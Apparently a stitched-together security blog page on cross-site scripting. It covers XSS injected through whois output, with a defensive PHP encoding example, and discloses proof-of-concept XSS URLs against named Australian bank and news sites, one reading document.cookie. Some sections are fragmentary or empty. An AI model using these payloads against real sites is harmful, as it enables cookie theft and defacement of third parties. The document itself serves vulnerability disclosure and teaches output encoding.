Email to trick bots (does not work)  ANIREACTOR.COM@hotmail.com



Notice the <script>open('http://privacy--protect.org/');</script> line? It causes a popup window to open if you query this domain through most web-based whois clients. In all the previously posted material regarding XSS in whois there has been a call for the registrar to filter special characters in the registrant details. That is wrong! Whois is a text-based protocol and, in accordance with RFC 954 (since superseded by RFC 3912), there is no need to filter input or encode output. The <script> line in the example above is provided by the whois server itself, after the registrant details, so filtering registrant data would not even remove it. Furthermore, the following is a valid whois query, but will lead to XSS in web-based whois clients because the server echoes the query back in its "No match" line:


$ whois "<script>alert('xss');</script>.com"

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

No match for "<SCRIPT>ALERT('XSS');</SCRIPT>.COM".
>>> Last update of whois database: Sat, 30 Jan 2010 10:21:07 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar.  Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability.  VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.

The Registry database contains ONLY .COM, .NET, .EDU domains and


Therefore, the only sane solution is to treat whois data as untrusted text and do the encoding on the web client side, at the point where the record is rendered into HTML!
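A web-based whois client that does exactly that, as an added example that is not from the post or any particular whois front-end: whois_query() speaks the protocol as RFC 3912 specifies it, and render_whois_html() is the single place where encoding happens, covering both the record body and the echoed query. The sample record is constructed from the lines in the post; whois.verisign-grs.com, mentioned in a comment for a live run, is the .com registry's whois server.

```php
<?php
// Added example, not any particular web-based whois front-end. whois_query()
// speaks the protocol as RFC 3912 specifies it (TCP port 43, one query line
// terminated by CRLF, read until the server closes the connection);
// render_whois_html() is the single place where HTML encoding happens. Both
// the record body and the echoed query are untrusted text at that point.

declare(strict_types=1);

function whois_query(string $server, string $query, int $timeout = 10): string {
    // A query is exactly one line; refuse anything that could become a second one.
    if (strpbrk($query, "\r\n\0") !== false) {
        throw new InvalidArgumentException('whois query must be a single line');
    }
    $sock = @fsockopen($server, 43, $errno, $errstr, $timeout);
    if ($sock === false) {
        throw new RuntimeException("connect to $server:43 failed: $errstr ($errno)");
    }
    stream_set_timeout($sock, $timeout);
    fwrite($sock, $query . "\r\n");
    $response = stream_get_contents($sock);   // the server closes after its answer
    fclose($sock);
    return $response === false ? '' : $response;
}

function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Everything is escaped once, here, at the boundary between text protocol and
// HTML. Neither registry nor registrar is expected to encode HTML in whois
// output, and <pre> keeps the record's line structure intact.
function render_whois_html(string $query, string $raw): string {
    return "<h2>whois " . h($query) . "</h2>\n"
         . "<pre>" . h($raw) . "</pre>\n";
}

// Constructed record made from the two lines in the post that would execute in
// a naive client: the echoed query and the registrar's own <script> line.
// For a live record: whois_query('whois.verisign-grs.com', 'example.com').
$sampleQuery = "<script>alert('xss');</script>.com";
$sampleRaw   = "No match for \"<SCRIPT>ALERT('XSS');</SCRIPT>.COM\".\n"
             . "Legal note:\n"
             . "<script>open('http://privacy--protect.org/');</script>\n";

echo render_whois_html($sampleQuery, $sampleRaw);
```

Keeping a single rendering function is what makes the rule enforceable: every code path that shows whois data to a browser goes through h(), so neither the query echo nor a registrar's boilerplate can slip through unencoded.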

Bank of Queensland XSS


ING XSS

I found an XSS vulnerability in ING's Australian website.
[Screenshot: ING - XSS - PoC.jpg]
The proof of concept URL used to illustrate the vulnerability is: http://www.ing.com.au/personal/Search.aspx?keyword=%27;alert(document.cookie);test=%27

XSS defacement mirror

Since xssed.org appears to be out of action there seems to be a need for an active xss defacement mirror. Some alternatives exist, such as the original XSS disclosure thread on sla.ckers.org or http://bugtraq.byethost22.com/. However these two sites don't offer the ease of use that xssed.org did with reporting xss.

If xssed.org cannot be brought back to life, this is what I would like to see in a defacement mirror:

  • Ability to submit post and cookie data or even tamper data xml
  • Automatic screen/browser-shot of the hole
  • Some level of community control to minimize the number of holes that needs to be moderated by admins
  • Automatic notification to the domain owner using postmaster, hostmaster, abuse, etc
  • Status indicator (validated, fixed, etc)
  • Automatic submission and validation by script src=http://xss-mirror/subandvalidate.js?username or similar technique
  • Published statistics; users, vulns, fixed, etc
I understand that there might be a business model involved here and things might not turn out quite like I had wished. Hopefully someone will take up the torch and either bring xssed back to life or start a new site to fill the gap left behind.
Westpac is so far the only bank I have tested which didn't filter their search field. Needless to say, the smell of an XSS casualty brings the zombies around.

[Screenshot: westpac-xss-poc.png]
The hole has been patched by Westpac now. The URL was:
http://search.westpac.com.au/search/search.cgi?collection=westpac&query=%3Cscript%3Ealert%28String.fromCharCode%2890,111,109,98,105,101,115,32,97,116,101,32,109,121,32,109,111,110,101,121,33%29%29%3C/script%3E&x=0&y=0

Pack of xss

I had some spare time last weekend and decided to go XSS hunting. Yeah I know old news, old vectors, boooring...

Unfortunately even though XSS is old news in the security community and there are well established techniques to mitigate the attack it is still ridiculously easy to find XSS vulnerabilities in most websites today. It seems the message isn't getting through.

Get all the details after the break, or use the quick links below

businessday.com.au
carsguide.com.au
conceptart.org
investsmart.com.au
mycareer.com.au
news.com.au
reuters.com
stays.com.au
three.com.au
thebigchair.com.au

This weblog is licensed under a Creative Commons License.